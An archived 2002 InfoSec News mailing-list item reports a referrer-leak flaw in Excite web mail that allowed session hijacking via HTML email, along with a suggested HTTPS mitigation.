[ISN] Excite in web mail hijack drama

From: InfoSec News (isnat_private)
Date: Fri Mar 22 2002 - 00:04:22 PST

  • Next message: InfoSec News: "[ISN] Comdex Attendees' Personal Data Exhibited On The Web"

    By James Middleton [21-03-2002]
    Security watchers have identified a vulnerability in the web mail
    service of internet portal Excite that allows for the hijacking of a
    user's account.
    According to the experts, when a user logs in to their account through
    Excite's web interface, the session is authenticated by a unique URL.
    By sending an HTML email which includes an image based on another
    server to the victim, an attacker can easily get the unique URL from
    the referrer field in the HTTP header.
    Simply pasting this into a web browser would drop the attacker
    straight into the victim's mailbox with complete control of the
    The exploit has been discussed to some degree on security mailing list
    Bugtraq, and Eyeonsecurity.net has even published a demonstration of
    the attack. Excite has been notified but has not yet responded.
    By way of combating the threat, Eyeonsecurity recommends using secure
    mode in the browser (HTTPS) to access Excite web mail. This prevents
    the referrer URL from being sent out.
    ISN is currently hosted by Attrition.org
    To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY
    of the mail.

    This archive was generated by hypermail 2b30 : Fri Mar 22 2002 - 03:39:34 PST